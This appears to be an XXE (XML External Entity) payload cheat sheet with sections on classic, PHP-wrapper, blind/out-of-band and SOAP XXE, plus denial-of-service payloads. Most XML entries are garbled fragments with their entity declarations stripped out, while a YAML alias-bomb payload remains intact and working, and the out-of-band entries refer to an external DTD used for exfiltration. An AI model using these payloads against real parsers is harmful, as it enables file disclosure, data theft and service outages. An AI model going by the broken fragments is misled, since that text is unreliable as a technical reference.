# XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input
## Exploit
Basic Test
```
]>
John
&example;
```
## Basic XXE
Classic XXE
```
]>
&file;
```
```
]>&xxe;
```
```
]>&xxe;
```
Classic XXE Base64 encoded
```
%init; ]>
```
## PHP Wrapper inside XXE
```
]>
Jean &xxe; Dupont
00 11 22 33 44
42 rue du CTF
75000
Paris
```
```
]>
&xxe;
```
## Deny of service
Deny Of Service - Billion Laugh Attack
```
]>
&a4;
```
Yaml attack
```
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
## Blind XXE
Blind XXE
```
]
>
&callhome;
```
XXE OOB Attack (Yunusov, 2013)
```
&send;
File stored on http://publicServer.com/parameterEntity_oob.dtd
">
%all;
```
XXE OOB with DTD and PHP filter
```
%sp;
%param1;
]>
&exfil;
File stored on http://127.0.0.1/dtd.xml
">
```
XXE Inside SOAP
```
%dtd;]>]]>
```
## Thanks to
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
* https://gist.github.com/staaldraad/01415b990939494879b4
* https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870